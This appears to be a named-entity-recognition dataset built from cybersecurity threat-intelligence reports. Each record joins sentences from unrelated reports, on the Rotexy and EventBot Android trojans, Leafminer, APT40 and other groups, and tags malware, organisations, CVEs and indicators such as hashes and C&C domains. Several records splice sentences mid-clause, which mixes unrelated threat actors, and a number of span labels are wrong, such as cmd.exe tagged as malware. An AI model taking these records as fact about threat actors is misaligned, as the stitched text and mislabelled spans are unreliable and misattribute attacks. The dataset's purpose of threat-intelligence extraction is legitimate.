.tmp folder after it has been executed . 
Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": [{"start": 228, "end": 235, "label": "System"}, {"start": 259, "end": 285, "label": "System"}, {"start": 320, "end": 324, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 385, "end": 392, "label": "Vulnerability"}, {"start": 485, "end": 488, "label": "System"}, {"start": 489, "end": 504, "label": "Vulnerability"}, {"start": 518, "end": 527, "label": "Organization"}]} {"text": "NEWMSG \u2013 write an SMS to the device memory containing the text and sender number sent from C & C . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": [{"start": 208, "end": 224, "label": "Malware"}, {"start": 331, "end": 342, "label": "Vulnerability"}, {"start": 343, "end": 351, "label": "Vulnerability"}, {"start": 465, "end": 470, "label": "Malware"}, {"start": 473, "end": 481, "label": "Malware"}]} {"text": "CHANGE_GCM_ID \u2013 change GCM ID . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . 
The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": [{"start": 141, "end": 157, "label": "Malware"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 288, "end": 299, "label": "Vulnerability"}]} {"text": "BLOCKER_BANKING_START \u2013 display phishing HTML page for entry of bank card details . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": [{"start": 164, "end": 189, "label": "Malware"}, {"start": 222, "end": 235, "label": "Vulnerability"}, {"start": 250, "end": 262, "label": "System"}, {"start": 294, "end": 320, "label": "System"}, {"start": 323, "end": 326, "label": "System"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 366, "end": 375, "label": "Organization"}, {"start": 392, "end": 416, "label": "Vulnerability"}, {"start": 419, "end": 432, "label": "Vulnerability"}, {"start": 463, "end": 465, "label": "Indicator"}]} {"text": "BLOCKER_EXTORTIONIST_START \u2013 display HTML page of the ransomware . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": [{"start": 151, "end": 176, "label": "Malware"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 237, "end": 249, "label": "System"}, {"start": 281, "end": 307, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 336, "end": 345, "label": "Organization"}, {"start": 370, "end": 383, "label": "Malware"}]} {"text": "BLOCKER_UPDATE_START \u2013 display fake HTML page for update . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": [{"start": 145, "end": 158, "label": "Malware"}, {"start": 178, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 271, "end": 280, "label": "Organization"}, {"start": 396, "end": 405, "label": "Malware"}]} {"text": "BLOCKER_STOP \u2013 block display of all HTML pages . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . 
Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia .", "spans": [{"start": 146, "end": 149, "label": "Organization"}, {"start": 171, "end": 178, "label": "Malware"}, {"start": 347, "end": 356, "label": "Malware"}, {"start": 360, "end": 369, "label": "Organization"}, {"start": 425, "end": 434, "label": "Organization"}]} {"text": "The C & C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": [{"start": 19, "end": 25, "label": "Malware"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 174, "end": 179, "label": "Malware"}, {"start": 257, "end": 265, "label": "Organization"}, {"start": 319, "end": 334, "label": "Organization"}, {"start": 337, "end": 350, "label": "Malware"}, {"start": 355, "end": 369, "label": "Malware"}]} {"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : \u201c 3458 \u201d \u2014 revoke device administrator privileges from the app ; \u201c hi \u201d , \u201c ask \u201d \u2014 enable and disable mobile internet ; \u201c privet \u201d , \u201c ru \u201d \u2014 enable and disable Wi-Fi ; \u201c check \u201d \u2014 send text \u201c install : [ device IMEI ] \u201d to phone number from which SMS was sent ; \u201c stop_blocker \u201d \u2014 stop displaying all blocking HTML pages ; \u201c 393838 \u201d \u2014 change C & C address to that specified in the Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on 
computers within the victim 's network . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": [{"start": 552, "end": 573, "label": "Malware"}, {"start": 620, "end": 629, "label": "Organization"}]} {"text": "SMS . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 47, "end": 64, "label": "Malware"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}]} {"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) . Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year .", "spans": [{"start": 43, "end": 49, "label": "Malware"}, {"start": 244, "end": 255, "label": "Malware"}, {"start": 267, "end": 278, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}]} {"text": "The server then sends a reply that contains instructions on further actions to be taken . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . 
Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 245, "end": 251, "label": "Organization"}, {"start": 267, "end": 282, "label": "Organization"}, {"start": 318, "end": 341, "label": "Organization"}]} {"text": "Displaying HTML pages We \u2019 ll now look at the HTML pages that Rotexy displays and the actions performed with them . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": [{"start": 62, "end": 68, "label": "Malware"}, {"start": 120, "end": 129, "label": "Malware"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 282, "end": 312, "label": "Vulnerability"}, {"start": 369, "end": 376, "label": "Organization"}]} {"text": "The Trojan displays a fake HTML update page ( update.html ) that blocks the device \u2019 s screen for a long period of time . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia .", "spans": [{"start": 46, "end": 57, "label": "Indicator"}, {"start": 178, "end": 192, "label": "Malware"}, {"start": 313, "end": 320, "label": "Organization"}]} {"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . 
RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East .", "spans": [{"start": 41, "end": 58, "label": "Indicator"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 207, "end": 210, "label": "System"}, {"start": 215, "end": 218, "label": "System"}, {"start": 295, "end": 303, "label": "Malware"}, {"start": 306, "end": 313, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}]} {"text": "The sexually explicit images in this screenshot have been covered with a black box . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": [{"start": 85, "end": 95, "label": "Organization"}, {"start": 164, "end": 179, "label": "Malware"}, {"start": 217, "end": 247, "label": "Malware"}, {"start": 250, "end": 257, "label": "Organization"}, {"start": 336, "end": 359, "label": "Organization"}]} {"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . 
This means that the Leafminer group is targeting electric utilities .", "spans": [{"start": 38, "end": 47, "label": "Indicator"}, {"start": 177, "end": 184, "label": "Organization"}, {"start": 200, "end": 219, "label": "Malware"}, {"start": 339, "end": 354, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}]} {"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the ACT for later potential ICS events .", "spans": [{"start": 146, "end": 155, "label": "Organization"}, {"start": 207, "end": 213, "label": "Organization"}, {"start": 252, "end": 269, "label": "Malware"}, {"start": 318, "end": 321, "label": "Malware"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 469, "end": 471, "label": "Organization"}, {"start": 519, "end": 522, "label": "Malware"}]} {"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . 
Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": [{"start": 91, "end": 101, "label": "Malware"}, {"start": 161, "end": 183, "label": "Malware"}, {"start": 188, "end": 213, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 323, "end": 342, "label": "Organization"}, {"start": 345, "end": 370, "label": "Organization"}, {"start": 388, "end": 409, "label": "Organization"}]} {"text": "In the areas marked \u2018 { text } \u2019 Rotexy displays the text it receives from the C & C . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 194, "end": 208, "label": "System"}, {"start": 228, "end": 243, "label": "Malware"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 319, "end": 338, "label": "Organization"}, {"start": 341, "end": 366, "label": "Organization"}, {"start": 384, "end": 405, "label": "Organization"}]} {"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . 
On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties .", "spans": [{"start": 185, "end": 204, "label": "System"}, {"start": 266, "end": 276, "label": "Malware"}, {"start": 294, "end": 304, "label": "Malware"}, {"start": 401, "end": 411, "label": "Organization"}, {"start": 447, "end": 453, "label": "System"}, {"start": 485, "end": 505, "label": "Organization"}, {"start": 547, "end": 555, "label": "Organization"}]} {"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": [{"start": 144, "end": 150, "label": "System"}, {"start": 154, "end": 162, "label": "System"}, {"start": 258, "end": 262, "label": "Malware"}, {"start": 325, "end": 338, "label": "Vulnerability"}]} {"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . 
Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 96, "end": 102, "label": "Malware"}, {"start": 265, "end": 273, "label": "System"}, {"start": 360, "end": 376, "label": "Malware"}, {"start": 405, "end": 423, "label": "System"}, {"start": 516, "end": 525, "label": "Indicator"}, {"start": 536, "end": 549, "label": "Vulnerability"}]} {"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": [{"start": 164, "end": 185, "label": "Malware"}, {"start": 196, "end": 211, "label": "System"}, {"start": 217, "end": 233, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 299, "end": 305, "label": "System"}, {"start": 365, "end": 384, "label": "Organization"}]} {"text": "If the user has provided the details of another card , then the following window is displayed : The application leaves the user with almost no option but to enter the correct card number , as it checks the entered number against the bank card details the cybercriminals received earlier . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . 
Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": [{"start": 324, "end": 335, "label": "Malware"}, {"start": 353, "end": 363, "label": "Malware"}, {"start": 377, "end": 394, "label": "Malware"}, {"start": 409, "end": 417, "label": "System"}, {"start": 466, "end": 475, "label": "Organization"}, {"start": 504, "end": 510, "label": "System"}, {"start": 570, "end": 589, "label": "Organization"}]} {"text": "When all the necessary card details are entered and have been checked , all the information is uploaded to the C & C . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": [{"start": 127, "end": 142, "label": "Malware"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 280, "end": 316, "label": "Indicator"}, {"start": 349, "end": 374, "label": "Organization"}]} {"text": "How to unblock the phone Now for some good news : Rotexy doesn \u2019 t have a very well-designed module for processing commands that arrive in SMSs . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": [{"start": 50, "end": 56, "label": "Malware"}, {"start": 153, "end": 161, "label": "Malware"}, {"start": 210, "end": 223, "label": "Vulnerability"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 419, "end": 429, "label": "Organization"}, {"start": 480, "end": 485, "label": "Organization"}]} {"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": [{"start": 205, "end": 221, "label": "Malware"}, {"start": 225, "end": 237, "label": "Malware"}, {"start": 282, "end": 291, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}]} {"text": "This is done by sending \u201c 3458 \u201d in an SMS to the blocked device \u2013 this will revoke the administrator privileges from the Trojan . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . 
This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": [{"start": 159, "end": 173, "label": "Malware"}, {"start": 195, "end": 221, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 262, "end": 283, "label": "Organization"}, {"start": 291, "end": 296, "label": "Organization"}, {"start": 387, "end": 395, "label": "Organization"}]} {"text": "After that it \u2019 s necessary to send \u201c stop_blocker \u201d to the same number \u2013 this will disable the display of HTML pages that extort money and block the screen . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": [{"start": 218, "end": 224, "label": "Malware"}, {"start": 229, "end": 254, "label": "Malware"}, {"start": 349, "end": 371, "label": "Organization"}, {"start": 408, "end": 422, "label": "Organization"}]} {"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . 
The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 381, "end": 389, "label": "Organization"}, {"start": 433, "end": 437, "label": "Organization"}]} {"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": [{"start": 137, "end": 148, "label": "System"}]} {"text": "In that case , you first need to send the text \u201c 393838 \u201d in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to \u201c : // \u201d , so the phone will no longer receive commands from the real C & C . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . 
Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": [{"start": 299, "end": 305, "label": "Malware"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 468, "end": 475, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}, {"start": 500, "end": 519, "label": "Organization"}, {"start": 526, "end": 545, "label": "Organization"}, {"start": 612, "end": 623, "label": "Organization"}, {"start": 628, "end": 645, "label": "Organization"}]} {"text": "Please note that these unblocking instructions are based on an analysis of the current version of Rotexy and have been tested on it . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": [{"start": 98, "end": 104, "label": "Malware"}, {"start": 168, "end": 202, "label": "Malware"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 353, "end": 370, "label": "Organization"}, {"start": 377, "end": 396, "label": "Organization"}, {"start": 399, "end": 421, "label": "Organization"}, {"start": 428, "end": 441, "label": "Organization"}]} {"text": "However , it \u2019 s possible the set of commands may change in future versions of the Trojan . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . 
Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": [{"start": 96, "end": 111, "label": "Malware"}, {"start": 162, "end": 173, "label": "Organization"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 328, "end": 342, "label": "Organization"}, {"start": 431, "end": 448, "label": "Organization"}, {"start": 451, "end": 459, "label": "Organization"}, {"start": 464, "end": 478, "label": "Organization"}, {"start": 481, "end": 494, "label": "Organization"}, {"start": 497, "end": 504, "label": "Organization"}, {"start": 507, "end": 525, "label": "Organization"}, {"start": 532, "end": 553, "label": "Organization"}]} {"text": "Geography of Rotexy attacks According to our data , 98 % of all Rotexy attacks target users in Russia . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": [{"start": 13, "end": 19, "label": "Malware"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 186, "end": 200, "label": "Organization"}, {"start": 290, "end": 301, "label": "Organization"}, {"start": 370, "end": 379, "label": "Malware"}]} {"text": "Indeed , the Trojan explicitly targets Russian-speaking users . 
The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": [{"start": 93, "end": 104, "label": "Malware"}, {"start": 223, "end": 229, "label": "System"}, {"start": 236, "end": 247, "label": "System"}, {"start": 268, "end": 274, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}]} {"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": [{"start": 127, "end": 138, "label": "Malware"}, {"start": 161, "end": 172, "label": "Malware"}, {"start": 211, "end": 227, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 385, "end": 390, "label": "Organization"}, {"start": 399, "end": 404, "label": "Organization"}]} {"text": "Kaspersky Internet Security for Android and the Sberbank Online app securely protect users against attacks by this Trojan . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . 
The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": [{"start": 0, "end": 27, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 48, "end": 67, "label": "System"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 154, "end": 192, "label": "Malware"}, {"start": 195, "end": 225, "label": "Malware"}, {"start": 228, "end": 232, "label": "System"}, {"start": 247, "end": 257, "label": "Malware"}, {"start": 264, "end": 279, "label": "Organization"}, {"start": 306, "end": 317, "label": "Organization"}, {"start": 320, "end": 334, "label": "Organization"}, {"start": 345, "end": 361, "label": "Organization"}]} {"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386 We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . 
We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": [{"start": 12, "end": 76, "label": "Indicator"}, {"start": 77, "end": 141, "label": "Indicator"}, {"start": 142, "end": 206, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 419, "end": 437, "label": "System"}, {"start": 446, "end": 457, "label": "Malware"}, {"start": 479, "end": 487, "label": "System"}, {"start": 501, "end": 506, "label": "Organization"}, {"start": 542, "end": 558, "label": "Organization"}]} {"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . 
Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 413, "end": 432, "label": "Organization"}, {"start": 447, "end": 458, "label": "Malware"}, {"start": 463, "end": 474, "label": "Malware"}, {"start": 491, "end": 496, "label": "Organization"}, {"start": 561, "end": 573, "label": "Organization"}]} {"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec \u0421 & C 2014\u20132015 : secondby.ru darkclub.net holerole.org googleapis.link 2015\u20132016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . 
APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 148, "end": 159, "label": "Indicator"}, {"start": 160, "end": 172, "label": "Indicator"}, {"start": 173, "end": 185, "label": "Indicator"}, {"start": 186, "end": 201, "label": "Indicator"}, {"start": 214, "end": 225, "label": "Indicator"}, {"start": 226, "end": 239, "label": "Indicator"}, {"start": 240, "end": 254, "label": "Indicator"}, {"start": 255, "end": 265, "label": "Indicator"}, {"start": 266, "end": 281, "label": "Indicator"}, {"start": 286, "end": 301, "label": "Malware"}, {"start": 323, "end": 341, "label": "Malware"}, {"start": 344, "end": 352, "label": "Malware"}, {"start": 355, "end": 363, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 389, "end": 401, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}]} {"text": "2016 freedns.website streamout.space 2017\u20132018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . 
We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": [{"start": 21, "end": 36, "label": "Indicator"}, {"start": 49, "end": 64, "label": "Indicator"}, {"start": 65, "end": 76, "label": "Indicator"}, {"start": 77, "end": 93, "label": "Indicator"}, {"start": 94, "end": 102, "label": "Malware"}, {"start": 174, "end": 194, "label": "Organization"}, {"start": 217, "end": 225, "label": "Malware"}, {"start": 242, "end": 249, "label": "System"}, {"start": 325, "end": 338, "label": "Vulnerability"}, {"start": 369, "end": 385, "label": "System"}, {"start": 388, "end": 391, "label": "Malware"}, {"start": 521, "end": 530, "label": "Malware"}, {"start": 573, "end": 578, "label": "Organization"}]} {"text": "EventBot is a mobile banking trojan and infostealer that abuses Android \u2019 s accessibility features to steal user data from financial applications , read user SMS messages , and steal SMS messages to allow the malware to bypass two-factor authentication . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 64, "end": 71, "label": "System"}, {"start": 318, "end": 336, "label": "Malware"}, {"start": 411, "end": 433, "label": "Organization"}, {"start": 478, "end": 483, "label": "Organization"}, {"start": 598, "end": 603, "label": "Organization"}]} {"text": "EventBot targets users of over 200 different financial applications , including banking , money transfer services , and crypto-currency wallets . 
If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard TIME ( UTC +8 ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 151, "end": 154, "label": "Malware"}, {"start": 252, "end": 292, "label": "Malware"}]} {"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": [{"start": 41, "end": 56, "label": "System"}, {"start": 59, "end": 66, "label": "System"}, {"start": 69, "end": 77, "label": "System"}, {"start": 80, "end": 89, "label": "System"}, {"start": 92, "end": 105, "label": "System"}, {"start": 108, "end": 115, "label": "System"}, {"start": 118, "end": 130, "label": "System"}, {"start": 133, "end": 145, "label": "System"}, {"start": 148, "end": 156, "label": "System"}, {"start": 159, "end": 170, "label": "System"}, {"start": 225, "end": 249, "label": "System"}, {"start": 337, "end": 346, "label": "Malware"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 373, "end": 383, "label": "Malware"}]} {"text": "It specifically targets financial banking applications across the United States and Europe 